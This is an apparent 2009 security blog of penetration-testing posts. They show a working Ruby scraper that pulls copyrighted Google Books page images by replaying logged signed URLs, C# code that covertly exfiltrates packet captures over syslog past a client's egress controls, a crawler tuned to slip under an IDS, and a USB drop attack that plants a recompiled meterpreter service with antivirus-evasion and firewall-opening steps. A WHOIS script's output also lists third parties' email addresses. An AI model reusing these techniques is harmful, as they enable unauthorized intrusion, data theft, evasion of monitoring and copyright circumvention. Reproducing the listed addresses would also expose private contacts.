Tuesday, June 2, 2009

Google Books Spidering

I don't usually read books on Google Books. The scans are not of the best quality, and they do not let me conveniently print a page or two for offline reading. That is apparently discouraged by Google: the site is meant as a "demo" to drive further purchases, and I am fine with that.
This post is not meant to discuss the merits of "crippled" demos. I actually want to talk a little about the content protection Google chose to employ.

In my mind, if you are trying to prevent content sifting or crawling (and they obviously do, since there is a copyright notice on every page), you should evaluate more methods of protection than obfuscating the JavaScript code that fetches images of scanned pages into the browser. You should not rely on AJAX calls alone to defeat first-generation (href-following) spiders, you should not allow incomplete randomization of URL parameters, and you SHOULD tie requests to an existing session.

So, on to the example.
Suppose I like the book Ruby by Example, I do not agree with Google's TOS, and I want to use the book's content for my own purposes.
Every page of the book scan I am interested in gets fetched with XHR from Google and rendered in the browser. Breaking on the request and following it around lands me at a JSON response in the following format.


Content-Type: application/javascript; charset=UTF-8
Server: OFE/0.1
Content-Length: 2496

{"page":[{"pid":"PR21","src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg","highlights":[{"X":370,"Y":51,"W":26,"H":11},{"X":139,"Y":93,"W":19,"H":10},{"X":218,"Y":119,"W":19,"H":10},{"X":352,"Y":186,"W":26,"H":11},{"X":230,"Y":214,"W":25,"H":11},{"X":417,"Y":255,"W":26,"H":11},{"X":493,"Y":269,"W":23,"H":11},{"X":370,"Y":449,"W":25,"H":11},{"X":402,"Y":490,"W":26,"H":11},{"X":139,"Y":585,"W":22,"H":11},{"X":320,"Y":614,"W":23,"H":11},{"X":146,"Y":681,"W":21,"H":9},{"X":158,"Y":690,"W":20,"H":9},{"X":139,"Y":699,"W":20,"H":9}],"flags":0,"order":22,"uf":"http://books.google.com/books_feedback?id=kq2dBNdAl3IC\x26spid=ygOBAha9Lj5wEmJbb7L0E4AMedYBAAAAEwAAAAvsLgsil0rRCj9QbBB0CmBqRC_Lik05VtZnyTK-XBfQ\x26ftype=0","vq":"ruby by


..... Many more entries go here.

This blob is processed by an obfuscated JS file with a long name, which puts it into the DOM and renders it in the browser. Let's say that's irrelevant at the moment.

Look at the following snippet from JSON response:


"src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg


OK, \x26 is really &. Otherwise, it's a valid URL for the 3x-zoomed image of page 21 of the book with id=kq2dBNdAl3IC.

There is also a dynamic signature of the page at the end: sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg

Every page of this book has a different signature. However, look at the following 2 requests:


http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA


There is a non-random element at the beginning of the payload. I am not going to go into how one could brute-force or fuzz the signature here, or how to read the client-side JS file to figure out what that signature consists of. The point is that content navigation is not tied to session cookies or any other UI navigation data. A simple GET on the URL fetches the image of a page.
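
For contrast, here is a rough Ruby sketch of what session-tied signing could look like on the server side. It only illustrates the recommendation above - the secret, the parameter names and the HMAC construction are all hypothetical, not Google's actual scheme.

require 'openssl'

# Derive the page-image signature from the caller's session id as well as
# the book and page, so a bare GET from another client (or no session at
# all) cannot replay a logged URL.
def page_sig(secret, session_id, book_id, page)
  data = [session_id, book_id, page].join('|')
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
end

def authorized?(params, session_id, secret)
  params['sig'] == page_sig(secret, session_id, params['id'], params['pg'])
end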

All you have to do now is set your favorite web proxy to log URLs for JPEGs matching ".*sig=ACfU3U.*" and iterate through the pages. You don't even need to capture the content yet.

Google does the job of fetching all the pages once you start mouse-scrolling in the book DIV. So you scroll through the whole book, then go to your proxy log and pick up the following records (substituting \x26 -> &).


http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA105&img=1&zoom=3&hl=en&sig=ACfU3U0SJesKmEQ2HUl2ntgNVBIrLK7UHQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA106&img=1&zoom=3&hl=en&sig=ACfU3U3i-gOkxdtYfeGLd7CFsRGZiPnT_Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA107&img=1&zoom=3&hl=en&sig=ACfU3U0FbGnYvyAY2T6uGV9rA-bY0J4cvw
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA10&img=1&zoom=3&hl=en&sig=ACfU3U3B0rfiUmevGsmVHgLEDN3sxANqkg
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA11&img=1&zoom=3&hl=en&sig=ACfU3U3uXbNxXALDKMG-OZ2bEGVlzN3JaA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA13&img=1&zoom=3&hl=en&sig=ACfU3U0Bb32Lu4L9KzlCRS1gbURVfNcklA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA14&img=1&zoom=3&hl=en&sig=ACfU3U1HVLZyKZBfm9y01Ly-Lp6AEo7B8Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA15&img=1&zoom=3&hl=en&sig=ACfU3U3aVGlHL9Sph_ttbm7tfSWVNyyFMQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA16&img=1&zoom=3&hl=en&sig=ACfU3U1CFrpu9LiQwuS1HIcsYu6qBrNppg


You now plug them into a script (curl will do, so will wget) to fetch the book's content.
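
Here is a minimal Ruby sketch of that fetch loop. It assumes the logged URLs (with \x26 already replaced by &) were saved one per line in urls.txt; the file name and output naming are my own placeholders.

require 'net/http'
require 'uri'

File.readlines('urls.txt').each_with_index do |line, i|
  uri = URI.parse(line.strip)
  resp = Net::HTTP.get_response(uri)
  # name the output after the pg= parameter, falling back to a counter
  name = (uri.query[/pg=([^&]+)/, 1] || i.to_s) + '.jpg'
  File.open(name, 'wb') { |f| f.write(resp.body) }
  sleep 2   # pace the requests so the traffic still looks human
end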

Now, I have not researched it enough, but I wonder if Watir or Selenium, or another browser automation framework, could scroll the content for you and automate the process altogether.

I don't encourage anyone to actually copy Google's content - go buy the book if you like it, because the people who suffer most from copying are the authors.
However, the question here is: how does Google plan to protect my data tomorrow if it cannot protect something it makes money on today?

Monday, June 1, 2009

Pcap2Syslog for .NET or Stuck transferring PCAP over UDP

I was recently in a situation where I wanted to transfer a fairly large .pcap file (1GB) out of an internal network as part of an engagement. I did have direct HTTP connectivity to the outside (proxied and monitored for illegal sites), so I tried HTTP uploads, but for some reason my transfers were getting dropped about 5 megs in. I had no control over the issue and frankly I did not want to dig even deeper than I already was. I think I was in the "3rd" tier, with all the nice policies applied to users like me so we cannot waste the company's time surfing the internet :) Anyway, all I had was outbound DNS for resolution, crippled HTTP, and Syslog. Don't ask me why Syslog was allowed out to the internet - probably for monitoring or data collection by a managed service provider or something like that.

I started thinking about chopping my pcap into smaller chunks and doing the upload. I knew exactly what I would do on *nix and had scripts made for a similar purpose, but I happened to be on Windows and did not readily know what tools I would use.

So DNS or Syslog?

I had not yet researched tools that would let me chop up binary data (such as a PCAP), package it in smaller chunks (Base64 or not) and shove it over a DNS tunnel. I am sure they exist, and most likely many smart folks out there can point me to the ones they prefer. To date, I had been fine bypassing content filtering with XML/RPC streams over HTTP(S). Not this time though.

Syslog? Well, it is foreign to Windows to begin with... What are the chances of getting the right tools fast enough to parse a PCAP and transform it into syslog messages? I gather there would be enough dependencies to deter me (or get my activities detected). Yeah, Cygwin comes to mind..

OK, start thinking outside the box. I have VS2008, so I have access to the .NET libraries. But what can parse PCAP, and which library can generate syslog messages? Well, Syslog is a simple protocol and message generation can be accomplished with plain Sockets, something like this.
Indeed, all you need is


using System.Net;
using System.Net.Sockets;

and in a nutshell:

1. Instantiate UDP transport

udp = new UdpClient(ipAddress, 514);

2. Build Syslog String according to the RFC:

// RFC 3164 message format: <PRI>TIMESTAMP HOSTNAME MSG
string[] strParams = { "<" + priority.ToString() + ">", time.ToString("MMM dd HH:mm:ss "),
machine + " ",
body };

3. Send the chunk out.

ASCIIEncoding ascii = new ASCIIEncoding();
byte[] rawMsg = ascii.GetBytes(string.Concat(strParams));
udp.Send(rawMsg, rawMsg.Length);
udp.Close();


The answer to the first question came in the form of SharpPcap. It's a standalone assembly which lives in

Tamir.IPLib.SharpPcap.dll.



using System;
using System.Text;
using System.IO;
using Tamir.IPLib;
using Tamir.IPLib.Packets;


Since it can read pcaps offline, I can do the following:


//Get an offline file pcap device
device = SharpPcap.GetPcapOfflineDevice(capFile);
//Open the device for capturing
device.PcapOpen();


Then, of course, you can iterate through packets like so:


while ((packet = device.PcapGetNextPacket()) != null)
{

DateTime ptime = packet.PcapHeader.Date;
int plen = packet.PcapHeader.PacketLength;

// Prints the time and length of each received packet to debug
Console.Write("{0}/{1}/{2} - {3}:{4}:{5}",
ptime.Day, ptime.Month, ptime.Year, ptime.Hour, ptime.Minute, ptime.Second);
StringBuilder sbuilder = new StringBuilder();

// Append whatever fields you want forwarded to the message builder
sbuilder.Append(String.Format("{0} len={1} ", ptime, plen));

// Either Call Syslog routines from above here,
// or call Syslog classes from here.
}




If you want to send, based on filters, only what you want out of the PCAP (say, a communication map to and from a host over UDP), then inside the while loop you can introduce more elaborate processing.


if (packet is UDPPacket) {
DateTime time = packet.Timeval.Date;
int ulen = packet.PcapHeader.PacketLength;
UDPPacket udp = (UDPPacket)packet;
string srcIp = udp.SourceAddress;
string dstIp = udp.DestinationAddress;
int srcPort = udp.SourcePort;
int dstPort = udp.DestinationPort;
Console.WriteLine(" UDP {0}:{1} -> {2}:{3}", srcIp, srcPort, dstIp, dstPort);
sbuilder.Append(String.Format(" UDP {0}:{1} -> {2}:{3}",
srcIp, srcPort, dstIp, dstPort));


// Append more to the message builder here if you want

// Either Call Syslog routines from above here,
// or call Syslog classes from here.

} }

It turned out better than I expected. I filtered what I needed for further analysis, and my partially "interesting" data went out in short messages over Syslog.

Next, I should really look at DNS covert channels. If anyone has suggestions on tools, please let me know.



Thursday, May 28, 2009

Automating AMI builds for Amazon EC2

I have started to use the Amazon EC2 cloud for penetration tests. Besides giving me short-term (it costs money), scalable processing power for various tasks, it also lets me care less if an automated IPS response blocks my IP. I can always bring up another instance...

Provisioning new instances is not hard. There's now the AWS console to take advantage of - useful and pretty. What's been bugging me is that EC2 images are snapshots of a system configuration that revert back to that known configuration. So if I apt-get something on my system and/or download some software, I have to rebuild the image so I don't lose the work. Yes, I can mount an S3 persistent storage drive and "try" to install all my software there, then just move it between instances as I bring them up. However, that may not work for me all the time. I want a (semi-)automated way of "fixating" the changes I make to the core system and starting new instances with the updated image.





So here is a somewhat automated way of building Amazon EC2 AMIs.


#!/bin/bash


usage(){
echo "Usage: $0 <ec2-host> <snapshot-name>"
}

EC2_HOST="$1"
EC2_SNAPSHOT="$2"

# Environment
EC2_HOME=/usr/local/ec2
EC2_PRIVATE_KEYF=pk-RKxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_PRIVATE_KEY=$EC2_HOME/pk-RKxxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_CERTF=cert-RKxxxxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_CERT=$EC2_HOME/cert-RKxxxxxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_HOST_DIR="/mnt"
EC2_RSA="$EC2_HOME/id_rsa-dxs-keypair"
EC2_ACCT=2245946456456456
EC2_DEFAULT_ARCH=i386

S3_BUCKET="dxs-yZksjhflsaudhflkajsdf"
EC2_ACCESSKEY="05HAPBln3245jk32j45"
EC2_SECKEY="pdyyyyyyyyyyyyyyyyyyyyyyyyyyy"

if [[ $# -ne 2 ]]
then
usage && exit 1
fi


echo "[*] Going to $EC2_HOME"
cd $EC2_HOME

echo "[*] Copying [PRIV] and [CERT] from $EC2_HOME to $EC2_HOST"
scp -i $EC2_RSA $EC2_CERT $EC2_PRIVATE_KEY root@$EC2_HOST:$EC2_HOST_DIR



echo "[*] Building AMI $EC2_SNAPSHOT to $EC2_HOST_DIR"
ssh -i $EC2_RSA root@$EC2_HOST \
"EC2_HOME=$EC2_HOME $EC2_HOME/bin/ec2-bundle-vol -d $EC2_HOST_DIR -k \
$EC2_HOST_DIR/$EC2_PRIVATE_KEYF \
-c $EC2_HOST_DIR/$EC2_CERTF -u $EC2_ACCT -r $EC2_DEFAULT_ARCH -p $EC2_SNAPSHOT"

echo "[*] Uploading AMI $EC2_SNAPSHOT to S3"
ssh -i $EC2_RSA root@$EC2_HOST "EC2_HOME=$EC2_HOME $EC2_HOME/bin/ec2-upload-bundle \
-b $S3_BUCKET -m $EC2_HOST_DIR/${EC2_SNAPSHOT}.manifest.xml -a $EC2_ACCESSKEY -s \
$EC2_SECKEY"

echo "[*] Checking S3 bucket"
/usr/bin/s3cmd ls s3://$S3_BUCKET

echo "[*] Currently Registered Instances"
$EC2_HOME/bin/ec2-describe-images

echo "[*] Registering Instance ${EC2_SNAPSHOT} "
$EC2_HOME/bin/ec2-register $S3_BUCKET/${EC2_SNAPSHOT}.manifest.xml

echo "[*] Newly Registered Instances"
$EC2_HOME/bin/ec2-describe-images

You may need to fetch the Amazon AMI Tools and create an AMI build environment
on the EC2 instance if you don't have them yet.

#echo "[*] Getting ec2-ami-tools from AMAZON"
wget http://s3.amazonaws.com/ec2-downloads/ec2-ami-tools.zip -O /tmp/ec2-ami-tools.zip

#echo "[*] Getting ec2-ami-tools to $EC2_HOST"
scp -i $EC2_RSA /tmp/ec2-ami-tools.zip root@$EC2_HOST:$EC2_HOST_DIR

#echo "[*] Making $EC2_HOME on $EC2_HOST"
ssh -i $EC2_RSA root@$EC2_HOST "mkdir -p /usr/local/ec2"


Of course, there's no limit to how automated you can make it.

Wednesday, May 27, 2009

Querying WHOIS Webservice with Powershell

There's an interesting WHOIS Web service at TryNT. If you are scanning a range of addresses and trying to determine the owners, it's useful to automate the lookups.

Apparently TryNT gets banned from certain IP ranges, or is simply hitting the Whois servers too hard, so sometimes a query returns an error. But for the most part it works.

Here's how one can query Whois via the TryNT web service:



PS C:\Users\dxs\Code\powershell> gc .\Whois-Webservice.ps1
function IpOwner(

[string]$ip="4.2.2.2"
){

BEGIN{
$whois=@{"query"=$ip};
$ErrorActionPreference="SilentlyContinue"
}

PROCESS {

#$uri="http://75.101.151.29/whois-api/v1/?h="+$ip+"&f=0"
$uri="http://www.trynt.com/whois-api/v1/?h="+$ip+"&f=0"
$resp=[xml](New-Object -TypeName System.Net.WebClient).Downloadstring($uri)
$whois.Add("organization",
$($resp.SelectNodes(
"descendant::Trynt/Whois/regrinfo/owner/organization") |
% { $_.InnerXml}) )
$whois.Add("TechEmail",
$($resp.SelectNodes(
"descendant::Trynt/Whois/regrinfo/tech/email") |
% { $_.InnerXml}) )
}

END{
Write-Host $whois.Values
}
}


1..254 | % { sleep(2); IpOwner("124.$_.165.1") }

The run:


PS C:\Users\dxs\Code\powershell> .\Whois-Webservice.ps1
SK Networks co., Ltd 124.1.165.1
WADONG ELEMENTARY SCHOOL 5ypascal@lycos.co.kr 124.2.165.1
Jeonrabukdo Wanju Education Office i3cc11@hanmail.net 124.3.165.1
GE Capital International Services munish.dargan@ge.com 124.4.165.1
KuRO TV noc@cnm.co.kr 124.5.165.1
NETWORK_VISMIN_DSL_IP_POOL aaa81020@globenet.com.ph 124.6.165.1
SIFY INFRASTRUCTURE ipadmin@sifycorp.com 124.7.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.8.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.9.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.10.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.11.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.12.165.1
TELEKOM MALAYSIA BERHAD ssc@tmnet.com.my 124.13.165.1
6F Greatwall Bldg., A38 Xueyuan Road Haidian District,Beijing speed0822@sina.com 124.14.165.1
6F Greatwall Bldg., A38 Xueyuan Road Haidian District,Beijing speed0822@sina.com 124.15.165.1
China Science & Technology Network lihong@cstnet.net.cn 124.16.165.1



Syncing NirSoft Repository

NirSoft has a great collection of tools streamlining some aspects of offensive penetration testing and system management. If you are stuck without your toolkit, it's possible to automatically sync the NirSoft repository to your local cache and go from there. The site posts a directory of utils here.
Each XML file describes an individual utility, including a direct download link which we can use to sync the depots.

Here's my Powershell script.



PS C:\Users\dxs\Code\powershell> gc .\SyncNirsoft.ps1


function GetNirSoftUtils(
$padLink=[string]"http://www.nirsoft.net/pad/pad-links.txt"

){

BEGIN{
Write-host "Getting PAD link"
$webclient=(New-Object -Type System.Net.WebClient)
$webclient.DownloadFile($padlink,"$(pwd)\pad-links.txt")
$padidx=$( Get-ChildItem $(pwd) "*.txt" | %{ $_.Name } )
write-host "Gotten: $padidx"

}
PROCESS{
Write-host "Getting PAD XML Links"
foreach ( $padxmllnk in $(Get-Content $padidx )){

# strip http:// for filesystem operation
$padxmllnkfs=$padxmllnk -replace "http://", ""

# basename the file (i.e /path/to/file -> file )
$padxmlfs=(split-path $padxmllnkfs -leaf).split("/")[-1]

# Conform to full path
$padxmlfs="$(pwd)\$padxmlfs"

# Download XML index files
Write-Host "Getting Index $padxmllnk --> $padxmlfs "
#$webclient.DownloadFile($padxmllnk,"$padxmlfs")

# Parsing Index and Getting Depot Download links
$depotids=[XML](Get-Content $padxmlfs )
$depotURL=$($depotids.SelectNodes(
"descendant::Web_Info/Download_URLs/Primary_Download_URL") |
% { $_.InnerXml})


# strip http:// for filesystem operation
$depotfs=$depotURL -replace "http://", ""

# basename the file (i.e /path/to/file -> file )
$depotfs=(split-path $depotfs -leaf).split("/")[-1]

# Conform to full path
$depotfs="$(pwd)\$depotfs"
Write-Host "Getting Depot $depotURL --> $depotfs "

$webclient.DownloadFile($depotURL,"$depotfs")

}
}
END{
Write-host "end"
}

}








Runtime example:


PS C:\Users\dxs\Code\powershell> .\SyncNirsoft.ps1
Getting PAD link
Gotten: pad-links.txt
Getting PAD XML Links
Getting Index http://www.nirsoft.net/pad/acm.xml --> C:\Users\dxs\Downloads\Nirsoft-PAD\acm.xml
Getting Depot http://www.nirsoft.net/utils/acm.zip --> C:\Users\dxs\Downloads\Nirsoft-PAD\acm.zip

Tuesday, May 26, 2009

Dynamic Link Crawler

So in a typical Web assessment, one of the things one normally does is crawl all or some portion of the target website. It just makes the "big picture" a bit clearer when looking at how the web app is structured. Conventional crawlers work on href references, recursively. Recently I looked at a site which I could not crawl. To be more specific, the site allowed me to crawl a few links and then it would stall me. Other times, it would send my crawler into an infinite loop. Either way, I could not accomplish what I came there to do.

It appeared that a Web IDS module was timing the link requests, and if I went too fast it would shut me down for 10 minutes. Additionally, my crawler was near useless navigating the dynamically generated buttons/links in the AJAX pages. I was a bit stuck. I don't mind manually testing a site, and in fact I prefer going near-manual once I get through the initial crawl. But I really did not want to spend the whole day manually punching in items (let's call them item numbers, as in a shopping cart scenario) to get through all the listings.

Well, we are in Web 2.0. As much as I wanted to stick with good ol' techniques or fall back to lazy manual crawling, I wanted to try to automate the form submissions and searches. I needed browser automation, really.

First I wanted to drive IE via the PowerShell COM bridge.
It's a nice solution and I will be looking at it in depth some time later. However, I went with the Watir framework to test my crawls and move on to more interesting stuff.

In IE (don't you love it when a site is only interested in MS-made browsers...) the following was accomplished. Suppose there's a search field and a type of search to perform. I was interested in crawling through the people in the catalog.

I also had a driver script, but manually it can be invoked as:

C:\Users\dxs\Tools\Ruby\bin\ruby.exe .\wsearch.rb LN "Blakkenship"
LN - for the LastName search field.


Code:

require 'watir'
require 'watir/close_all'


browser = Watir::IE.new
form=nil;
criteria=nil;

if ( ARGV.length == 2 )
criteria = ARGV[1]
format = case ARGV[0]
when "KW" then
form="formKeyword"

when "LN" then
form="formLastname"

when "FN" then
form="formFirstname"

else
raise "Invalid Format Arguments: Need KW,LN,FN etc."
end



else
puts "Error in arguments: specify Format (KW,LN,FN,etc.) and Search Criteria"
exit(1)
end

site = "http://site.com/index.cfm?contentID=21&type=1"

browser.goto site
puts "Searching through for: #{form} , criteria: #{criteria}"
browser.text_field(:name, form).set criteria

browser.button(:name, "Search").click
puts "\n\n"
browser.links.each { |l| puts l.href + "--->" + l.text if l.text =~ /#{criteria}/io }

Watir::IE.close_all



Output:

http://url.reference.to.entities?here&it=comes -> Mnemonic Name

I have to admit, instrumenting browsers is slow, and I was not nearly as fast as with a conventional crawler. Then again, the code is crude - no threading, no optimization, just plain "hacked up" in a hurry. 7 hours later, and 100% under the IDS radar, I had emulated a human browsing the site. I had a nice database of stuff to work with come morning...


There is also FireWatir for driving Firefox in case it's needed.

Saturday, May 23, 2009

Social Engineering meets Offensive technologies: using USB U3 flash drive with meterpreter payload

I was recently involved in a Social Engineering experiment, the goal of which was to obtain access to a PC inside the organization. I am not going to cover the social engineering aspect of the job in this post. I want to concentrate on another, technical, aspect: how close proximity to physical hardware got me the data I needed.

I have been reading elsewhere about how Social Engineers leverage client-side exploitation, which involves either a browser exploit, email attachments, or USB devices left with the "secretary". During the engagement I had an opportunity to coerce the receptionist into printing out my "resume" on her machine. So I thought it might be the perfect time to try the "USB" way. Until that day I had never messed around with the U3 system or created my own custom payload for that specific purpose. This was a perfect opportunity to have fun.

There are several viable approaches and pre-made USB payload distributions serving this purpose: HackSaw, SwitchBlade, and others. Read more here:
http://dotnetwizard.net/soft-apps/hack-u3-usb-smart-drive-to-become-ultimate-hack-tool/ and here: http://wiki.hak5.org/wiki/USB_Switchblade

I decided to go with a customized version of Switchblade. I ripped out what I did not need for the compromise of the targeted computer, created a U3CUSTOM image and overlaid it onto my Walmart-bought $10 SanDisk 1GB U3 Cruzer drive.

The goal was to show up the next morning, attempt to hand the drive with my "resume" to the secretary (a very nice and honest woman, btw), and have her print it out. I chose not to rely on Microsoft Word macros because I had some knowledge of the company's policy preventing such elevation. I also knew that the company ran an updated antivirus, and that the solution needed to be stealthy. I was not sure which AV, though, so I had to be careful to avoid detection of the payload on my USB as best I could. I also had to provision for a connection back to her PC.

I needed to know the IP and all other relevant information, and I only had about 20-30 seconds of "hit-and-run" while she opened the document and handed me the printed copy.

Prep Steps taken:
1. Remaster the U3 image to include Alex Sotirov's metsvc (http://www.phreedom.org/software/metsvc/). Modify the source and recompile it with the MinGW compiler to improve the chances of AV evasion. Something like this:

C:\metsvc-1.0\metsvc-1.0\src>c:\MinGW\bin\gcc.exe -O4 -o metsvc.exe metsvc.cpp -l ws2_32 -l advapi32


This executable had given me trouble before when I tried several packers - UPX, ASPack, and MPRESS - with various degrees of success against VirusTotal. I finally decided not to pack at all and to go with heavy optimization at compile time plus a hex editor to polish the deal.

I would have loved to use msfpayload for obfuscation, but I had no Linux box at my disposal, and I could not seem to find this executable in the Win32 MSF Framework distribution.

2. UPX-pack other useful executables for fetching the history and passwords from her PC (in case my remote session connection fails and I need to log in to the PC directly).

3. Once the drive is inserted into a USB slot, U3 silently runs my chain of commands. I had to test that the whole operation completes within 20 seconds. I added several more tweaks (like enabling firewall exceptions for the meterpreter service via netsh commands) as extra insurance.

4. I remove the drive, with the gathered information saved in its logs, and go from there...

Show time

Everything went better than I expected from the AV evasion perspective. No popups or error messages. I even got the wireless key hash via WIFIKE from NirSoft. The logs showed that the meterpreter service did start up, and I did eventually find a way to verify that :)


So I was happy, because I now have more or less another methodology I can use to help others realize the risks of Social Engineering meeting exploitation technology.

Wednesday, May 13, 2009

Discovering Metasploit API: Structure of installation

I was playing with MSF user cache and overwrote it, accidentally :)

1. To avoid my inevitable sloppiness in the future, I am going to try to offload scripts to a more "static" location (like ~/Code/metasploit) and invoke the MSF APIs from there. This will allow me to develop and debug scripts outside of ~/.msf or /modules/. I can always move them there eventually.

For that I have to add the following at the beginning of the script:

$:.unshift("/Users/dimas/framework-3.2/lib")

This line essentially allows me to prepend MSF library path to the search order for useful MSF classes and modules.

2. To better understand how MSF is laid out, I also wanted to create a little helper for myself showing what's where. The MSF class Msf::Config allows me to create such a reference.
I will use calls similar to the following:

Msf::Config.get_config_root


For detailed information see Metasploit API here.

I am also going to use MSF's Rex library to nicely format the table of locations. Like so:


rt=Rex::Ui::Text::Table.new({
"Header" => "Structure of the installation",
"HeaderIndent" => 3,
"Columns" => ["Setting Name", "Location"],
"Indent" => 1

})


Here's what I came up with:



#!/usr/bin/env ruby
#
$:.unshift("/Users/dimas/framework-3.2/lib")

#
require 'rex/ui'
require 'msf/base'

rt=Rex::Ui::Text::Table.new({
"Header" => "Structure of the installation",
"HeaderIndent" => 3,
"Columns" => ["Setting Name", "Location"],
"Indent" => 1

})
rt.add_hr()
copts={
"Config Root" => Msf::Config.get_config_root,
"Install Root" => Msf::Config.install_root,
"Config Directory" => Msf::Config.config_directory,
"Config File" => Msf::Config.config_file,
"Data Directory" => Msf::Config.data_directory,
"Module Directory" => Msf::Config.module_directory,
"Plugin Directory" => Msf::Config.plugin_directory,
"Script Directory" => Msf::Config.script_directory,
"Session Directory" => Msf::Config.session_log_directory,
"User Module Directory" => Msf::Config.user_module_directory,
"User Script Directory" => Msf::Config.user_script_directory,
"Log Directory" => Msf::Config.log_directory
}

copts.each { |k,v| rt.add_row([k,v]) }
rt.add_hr()
rt.print


And I now have a nice reference:

Structure of the installation
=============================

Setting Name Location
------------ --------

Plugin Directory /Users/dimas/framework-3.2/plugins
Script Directory /Users/dimas/framework-3.2/scripts
User Module Directory /Users/dimas/.msf3/modules
Config Directory /Users/dimas/.msf3
Config Root /Users/dimas/.msf3
Data Directory /Users/dimas/framework-3.2/data
Log Directory /Users/dimas/.msf3/logs
User Script Directory /Users/dimas/.msf3/scripts
Session Directory /Users/dimas/.msf3/logs/sessions
Module Directory /Users/dimas/framework-3.2/modules
Install Root /Users/dimas/framework-3.2
Config File /Users/dimas/.msf3/config

Monday, May 11, 2009

Discovering Metasploit API : Utility functions

I often write scripts and programs to help me in my automation and testing projects. Many times I find it easier to do a one- or two-liner, or write a short program, than to search for a command line tool or GUI to accomplish my task. There are so many great specialized tools out there, but I just don't do a good job of keeping track of their releases and functionality. However, I am very fond of scriptable frameworks because they give you the best of both worlds: flexibility and familiarity/repeatability.

So I have started playing with the Metasploit API to better understand the framework and see what else I could be doing with it. I wanted to educate myself on the "framework" part. Besides, the quality of the code is amazing - I actually use the Metasploit Framework as a reference for Ruby programming.

I started by reading the Developer's Guide and going through Rex API first.

Here are some things I will use going forward.

- Can discover Byte-order of the Host/target:

Rex::Arch.endian("ppc") => 1
Rex::Arch.endian("x86") => 0
- Can Pack and Re-pack data based on the byte-order
>> Rex::Arch.pack_addr(ARCH_X86,0x7889)
=> "\211x\000\000"
>> Rex::Arch.pack_addr(ARCH_MIPS,0x7889)
=> "\000\000x\211"


- Can programmatically take advantage of Inline assembly:
>> Rex::Assembly::Nasm.assemble("Mov ebp, 0x1")
=> "\275\001\000\000\000"


... and disassembly
>> Rex::Assembly::Nasm.disassemble("\275\001\000\000\000")
=> "00000000 BD01000000 mov ebp,0x1\n"


- Can determine OS cross-platform:
>> Rex::Compat.is_macosx
=> true


- Can open browser on target system ( also cross-platform. This example is what Windows likes)
Rex::Compat.open_browser(url='http://metasploit.com/')


Also, conversion and transformation facilities are very handy.
- Convert To ASCII encoding
>> Rex::Encoder::NDR::byte(0x5e)
=> "^"


- XOR encode/decode
Rex::Encoder::Xor::EncoderKlass = Rex::Encoding::Xor::Dword
enc=Rex::Encoder::Xor.new
enc.encode("AAA",'')


- or -
enc.encode("AAA",'BADCHARS-GO-HERE')
=> "\340\267y"


Now, this is nice and very useful - Obfuscating Javascript:
@opts={"Strings"=>nil, "Symbols"=>{"Namespaces"=>[], "Variables"=>['a'], "Classes"=>[], "Methods"=>['fun1']}}

js="var a=5; function fun1{ return false; }; //Comment"

Rex::Exploitation::ObfuscateJS.new(js, @opts).obfuscate
=> "vgMzBoAwuwunIaYjqXMaeHaGBWr gMzBoAwuwunIaYjqXMaeHaGBW=5;
function jibbyKShzFDQ{ return fgMzBoAwuwunIaYjqXMaeHaGBWlse; }; "


- Epoch to Human Time Conversion and back
>> Rex::ExtTime.sec_to_s(6444444)
=> "74 days 14 hours 7 mins 24 secs "


>> Rex::ExtTime.str_to_sec("5 days 4 hours 3 minutes")
=> 446580


- Equivalent of "which" on *nix platforms
>> Rex::FileUtils.find_full_path("apropos")
=> "/usr/bin/apropos"


- MIME encodings and attachments. I always miss this one - I cannot seem to remember the format and have to go back to my old scripts for reference.

msg=Rex::MIME::Message.new
msg.add_part("hello",'text/plain',"8bit",nil)
msg.add_part_inline_attachment("this is inline", "inline_name")
msg.to_s
=> "\r\n\r\n--_Part_525_148040077_1316503564\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: 8bit\r\n\r\nhello\r\n--_Part_525_148040077_1316503564\r\nContent-Type: application/octet-stream; name=\"inline_name\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: inline; filename=\"inline_name\"\r\n\r\ndGhpcyBpcyBpbmxpbmU=\r\n\r\n--_Part_525_148040077_1316503564--\r\n"


- Ad-hoc Ruby block execution
Rex::Script.execute("puts 'hello'")


- Abundant Networking functionality
Rex::Socket.addr_atoi("1.2.3.4")
=> 16909060


